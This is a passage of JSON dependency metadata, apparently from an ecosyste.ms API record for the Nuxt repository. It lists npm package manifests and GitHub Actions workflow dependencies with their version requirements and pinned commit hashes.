id":13870354506,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":13870354507,"package_name":"vue","ecosystem":"npm","requirements":"latest","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/runtime-compiler/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T09:09:16.150Z","updated_at":"2023-09-22T09:09:16.150Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/runtime-compiler/package.json","dependencies":[{"id":13870354861,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/docs-deploy.yml","sha":null,"kind":"manifest","created_at":"2023-12-15T03:37:23.566Z","updated_at":"2023-12-15T03:37:23.566Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/docs-deploy.yml","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/label-pr.yml","sha":null,"kind":"manifest","created_at":"2023-12-15T03:37:24.060Z","updated_at":"2023-12-15T03:37:24.060Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/label-pr.yml","dependencies":[{"id":15098940168,"package_name":"actions/github-script","ecosystem":"actions","requirements":"60a0d83039c74a4aee543508d2ffcb1c3799cdea","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/notify-nuxt-bridge.yml","sha":null,"kind":"manifest","created_at":"2023-12-17T23:30:46.920Z","updated_at":"2023-12-17T23:30:46.920Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/notify-nuxt-bridge.yml","dependencies":[{"id":15150779358,"package_name":"peter-evans/repository-dispatch","ecosystem":"actions","requirements":"bf47d102fdb849e755b0b0023ea3e81a44b6f570","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/cache-cleanup.yml","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:03.476Z","updated_at":"2024-11-12T22:24:03.476Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/cache-cleanup.yml","dependencies":[]},{"ecosystem":"actions","filepath":".github/workflows/changelog.yml","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:03.521Z","updated_at":"2024-11-12T22:24:03.521Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/changelog.yml","dependencies":[{"id":20701856327,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":20701856328,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"39370e3970a6d050c480ffad4ff0ed4d3fdee5af","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/docs-check-links.yml","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:03.624Z","updated_at":"2024-11-12T22:24:03.624Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/docs-check-links.yml","dependencies":[{"id":20701856329,"package_name":"actions/cache","ecosystem":"actions","requirements":"6849a6489940f00c2f30c0fb92c6274307ccb58a","direct":true,"kind":"composite","optional":false},{"id":20701856330,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":20701856331,"package_name":"lycheeverse/lychee-action","ecosystem":"actions","requirements":"5cd5ba7877bce8b3973756ae3c9474ce1e50be2f","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/lint-workflows.yml","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:03.846Z","updated_at":"2024-11-12T22:24:03.846Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/lint-workflows.yml","dependencies":[{"id":20701856436,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":20701856437,"package_name":"docker://rhysd/actionlint","ecosystem":"actions","requirements":"1.7.4","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/release.yml","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:04.271Z","updated_at":"2024-11-12T22:24:04.271Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/release.yml","dependencies":[{"id":20701857045,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":20701857046,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"39370e3970a6d050c480ffad4ff0ed4d3fdee5af","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/stackblitz-link.yml","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:04.361Z","updated_at":"2024-11-12T22:24:04.361Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/stackblitz-link.yml","dependencies":[{"id":20701857047,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":20701857048,"package_name":"huang-julien/reproduire-sur-stackblitz","ecosystem":"actions","requirements":"9ceccbfbb0f2f9a9a8db2d1f0dd909cf5cfe67aa","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/stale.yml","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:05.641Z","updated_at":"2024-11-12T22:24:05.641Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/stale.yml","dependencies":[{"id":20701857051,"package_name":"actions/stale","ecosystem":"actions","requirements":"28ca1036281a5e5922ead5184a1bbf96e5fc984e","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"npm","filepath":"packages/rspack/package.json","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:05.745Z","updated_at":"2024-11-12T22:24:05.745Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/rspack/package.json","dependencies":[{"id":20701857052,"package_name":"@nuxt/friendly-errors-webpack-plugin","ecosystem":"npm","requirements":"^2.6.0","direct":true,"kind":"runtime","optional":false},{"id":20701857053,"package_name":"@nuxt/kit","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":20701857054,"package_name":"@rspack/core","ecosystem":"npm","requirements":"^1.1.1","direct":true,"kind":"runtime","optional":false},{"id":20701857095,"package_name":"autoprefixer","ecosystem":"npm","requirements":"^10.4.20","direct":true,"kind":"runtime","optional":false},{"id":20701857096,"package_name":"css-loader","ecosystem":"npm","requirements":"^7.1.2","direct":true,"kind":"runtime","optional":false},{"id":20701857097,"package_name":"css-minimizer-webpack-plugin","ecosystem":"npm","requirements":"^7.0.0","direct":true,"kind":"runtime","optional":false},{"id":20701857098,"package_name":"cssnano","ecosystem":"npm","requirements":"^7.0.6","direct":true,"kind":"runtime","optional":false},{"id":20701857099,"package_name":"defu","ecosystem":"npm","requirements":"^6.1.4","direct":true,"kind":"runtime","optional":false},{"id":20701857100,"package_name":"esbuild-loader","ecosystem":"npm","requirements":"^4.2.2","direct":true,"kind":"runtime","optional":false},{"id":20701857101,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"^5.0.0","direct":true,"kind":"runtime","optional":false},{"id":20701857102,"package_name":"estree-walker","ecosystem":"npm","requirements":"^3.0.3","direct":true,"kind":"runtime","optional":false},{"id":20701857103,"package_name":"file-loader","ecosystem":"npm","requirements":"^6.2.0","direct":true,"kind":"runtime","optional":false},{"id":20701857104,"package_name":"fork-ts-checker-webpack-plugin","ecosystem":"npm","requirements":"^9.0.2","direct":true,"kind":"runtime","optional":false},{"id":20701857105,"package_name":"globby","ecosystem":"npm","requirements":"^14.0.2","direct":true,"kind":"runtime","optional":false},{"id":20701857106,"package_name":"h3","ecosystem":"npm","requirements":"npm:h3-nightly@2.0.0-1718872656.6765a6e","direct":true,"kind":"runtime","optional":false},{"id":20701857107,"package_name":"hash-sum","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":20701857108,"package_name":"jiti","ecosystem":"npm","requirements":"^2.4.0","direct":true,"kind":"runtime","optional":false},{"id":20701857109,"package_name":"knitwork","ecosystem":"npm","requirements":"^1.1.0","direct":true,"kind":"runtime","optional":false},{"id":20701857110,"package_name":"lodash-es","ecosystem":"npm","requirements":"4.17.21","direct":true,"kind":"runtime","optional":false},{"id":20701857111,"package_name":"magic-string","ecosystem":"npm","requirements":"^0.30.12","direct":true,"kind":"runtime","optional":false},{"id":20701857112,"package_name":"memfs","ecosystem":"npm","requirements":"^4.14.0","direct":true,"kind":"runtime","optional":false},{"id":20701857113,"package_name":"mlly","ecosystem":"npm","requirements":"^1.7.3","direct":true,"kind":"runtime","optional":false},{"id":20701857114,"package_name":"ohash","ecosystem":"npm","requirements":"^1.1.4","direct":true,"kind":"runtime","optional":false},{"id":20701857115,"package_name":"pathe","ecosystem":"npm","requirements":"^1.1.2","direct":true,"kind":"runtime","optional":false},{"id":20701857116,"package_name":"pify","ecosystem":"npm","requirements":"^6.1.0","direct":true,"kind":"runtime","optional":false},{"id":20701857117,"package_name":"postcss","ecosystem":"npm","requirements":"^8.4.49","direct":true,"kind":"runtime","optional":false},{"id":20701857118,"package_name":"postcss-import","ecosystem":"npm","requirements":"^16.1.0","direct":true,"kind":"runtime","optional":false},{"id":20701857119,"package_name":"postcss-import-resolver","ecosystem":"npm","requirements":"^2.0.0","direct":true,"kind":"runtime","optional":false},{"id":20701857120,"package_name":"postcss-loader","ecosystem":"npm","requirements":"^8.1.1","direct":true,"kind":"runtime","optional":false},{"id":20701857121,"package_name":"postcss-url","ecosystem":"npm","requirements":"^10.1.3","direct":true,"kind":"runtime","optional":false},{"id":20701857122,"package_name":"pug-plain-loader","ecosystem":"npm","requirements":"^1.1.0","direct":true,"kind":"runtime","optional":false},{"id":20701857123,"package_name":"std-env","ecosystem":"npm","requirements":"^3.8.0","direct":true,"kind":"runtime","optional":false},{"id":20701857124,"package_name":"time-fix-plugin","ecosystem":"npm","requirements":"^2.0.7","direct":true,"kind":"runtime","optional":false},{"id":20701857373,"package_name":"ufo","ecosystem":"npm","requirements":"^1.5.4","direct":true,"kind":"runtime","optional":false},{"id":20701857374,"package_name":"unenv","ecosystem":"npm","requirements":"^1.10.0","direct":true,"kind":"runtime","optional":false},{"id":20701857375,"package_name":"unplugin","ecosystem":"npm","requirements":"^1.15.0","direct":true,"kind":"runtime","optional":false},{"id":20701857376,"package_name":"url-loader","ecosystem":"npm","requirements":"^4.1.1","direct":true,"kind":"runtime","optional":false},{"id":20701857377,"package_name":"vue-bundle-renderer","ecosystem":"npm","requirements":"^2.1.1","direct":true,"kind":"runtime","optional":false},{"id":20701857378,"package_name":"vue-loader","ecosystem":"npm","requirements":"^17.4.2","direct":true,"kind":"runtime","optional":false},{"id":20701857379,"package_name":"webpack-bundle-analyzer","ecosystem":"npm","requirements":"^4.10.2","direct":true,"kind":"runtime","optional":false},{"id":20701857380,"package_name":"webpack-dev-middleware","ecosystem":"npm","requirements":"^7.4.2","direct":true,"kind":"runtime","optional":false},{"id":20701857381,"package_name":"webpack-hot-middleware","ecosystem":"npm","requirements":"^2.26.1","direct":true,"kind":"runtime","optional":false},{"id":20701857382,"package_name":"webpack-virtual-modules","ecosystem":"npm","requirements":"^0.6.2","direct":true,"kind":"runtime","optional":false},{"id":20701857383,"package_name":"webpackbar","ecosystem":"npm","requirements":"^7.0.0","direct":true,"kind":"runtime","optional":false},{"id":20701857384,"package_name":"@nuxt/schema","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"development","optional":false},{"id":20701857385,"package_name":"@types/hash-sum","ecosystem":"npm","requirements":"1.0.2","direct":true,"kind":"development","optional":false},{"id":20701857386,"package_name":"@types/lodash-es","ecosystem":"npm","requirements":"4.17.12","direct":true,"kind":"development","optional":false},{"id":20701857387,"package_name":"@types/pify","ecosystem":"npm","requirements":"5.0.4","direct":true,"kind":"development","optional":false},{"id":20701857388,"package_name":"@types/webpack-bundle-analyzer","ecosystem":"npm","requirements":"4.7.0","direct":true,"kind":"development","optional":false},{"id":20701857389,"package_name":"@types/webpack-hot-middleware","ecosystem":"npm","requirements":"2.25.9","direct":true,"kind":"development","optional":false},{"id":20701857397,"package_name":"rollup","ecosystem":"npm","requirements":"4.25.0","direct":true,"kind":"development","optional":false},{"id":20701857398,"package_name":"unbuild","ecosystem":"npm","requirements":"3.0.0-rc.11","direct":true,"kind":"development","optional":false},{"id":20701857399,"package_name":"vue","ecosystem":"npm","requirements":"3.5.12","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"packages/ui-templates/package.json","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:10.664Z","updated_at":"2024-11-12T22:24:10.664Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/packages/ui-templates/package.json","dependencies":[{"id":20701857400,"package_name":"@unocss/reset","ecosystem":"npm","requirements":"0.64.0","direct":true,"kind":"development","optional":false},{"id":20701857401,"package_name":"beasties","ecosystem":"npm","requirements":"0.1.0","direct":true,"kind":"development","optional":false},{"id":20701857404,"package_name":"html-validate","ecosystem":"npm","requirements":"8.25.0","direct":true,"kind":"development","optional":false},{"id":20701857405,"package_name":"htmlnano","ecosystem":"npm","requirements":"2.1.1","direct":true,"kind":"development","optional":false},{"id":20701857406,"package_name":"jiti","ecosystem":"npm","requirements":"2.4.0","direct":true,"kind":"development","optional":false},{"id":20701857407,"package_name":"knitwork","ecosystem":"npm","requirements":"1.1.0","direct":true,"kind":"development","optional":false},{"id":20701857408,"package_name":"pathe","ecosystem":"npm","requirements":"1.1.2","direct":true,"kind":"development","optional":false},{"id":20701857409,"package_name":"prettier","ecosystem":"npm","requirements":"3.3.3","direct":true,"kind":"development","optional":false},{"id":20701857410,"package_name":"scule","ecosystem":"npm","requirements":"1.3.0","direct":true,"kind":"development","optional":false},{"id":20701857411,"package_name":"tinyexec","ecosystem":"npm","requirements":"0.3.1","direct":true,"kind":"development","optional":false},{"id":20701857412,"package_name":"tinyglobby","ecosystem":"npm","requirements":"0.2.10","direct":true,"kind":"development","optional":false},{"id":20701857413,"package_name":"unocss","ecosystem":"npm","requirements":"0.64.0","direct":true,"kind":"development","optional":false},{"id":20701857414,"package_name":"vite","ecosystem":"npm","requirements":"5.4.11","direct":true,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/suspense/package.json","sha":null,"kind":"manifest","created_at":"2024-11-12T22:24:12.144Z","updated_at":"2024-11-12T22:24:12.144Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/suspense/package.json","dependencies":[{"id":20701857415,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false},{"id":20701857416,"package_name":"typescript","ecosystem":"npm","requirements":"latest","direct":true,"kind":"development","optional":false}]},{"ecosystem":"actions","filepath":".github/workflows/lint-monorepo.yml","sha":null,"kind":"manifest","created_at":"2024-12-04T00:33:45.265Z","updated_at":"2024-12-04T00:33:45.265Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/.github/workflows/lint-monorepo.yml","dependencies":[{"id":21025758335,"package_name":"actions/checkout","ecosystem":"actions","requirements":"11bd71901bbe5b1630ceea73d27597364c9af683","direct":true,"kind":"composite","optional":false},{"id":21025758336,"package_name":"actions/setup-node","ecosystem":"actions","requirements":"39370e3970a6d050c480ffad4ff0ed4d3fdee5af","direct":true,"kind":"composite","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/hmr/package.json","sha":null,"kind":"manifest","created_at":"2024-12-04T00:33:45.584Z","updated_at":"2024-12-04T00:33:45.584Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/hmr/package.json","dependencies":[{"id":21025758398,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"npm","filepath":"test/fixtures/spa-loader/package.json","sha":null,"kind":"manifest","created_at":"2024-12-25T13:30:53.913Z","updated_at":"2024-12-25T13:30:53.913Z","repository_link":"https://github.com/nuxt/nuxt/blob/main/test/fixtures/spa-loader/package.json","dependencies":[{"id":21273752168,"package_name":"nuxt","ecosystem":"npm","requirements":"workspace:*","direct":true,"kind":"runtime","optional":false}]}],"score":36.10175972375916,"created_at":"2023-04-13T13:33:18.529Z","updated_at":"2026-05-14T03:30:47.247Z","avatar_url":"https://github.com/nuxt.png","language":"TypeScript","codemeta":null,"publiccode":null,"project_url":"https://summary.ecosyste.ms/api/v1/projects/3601","html_url":"https://summary.ecosyste.ms/projects/3601"}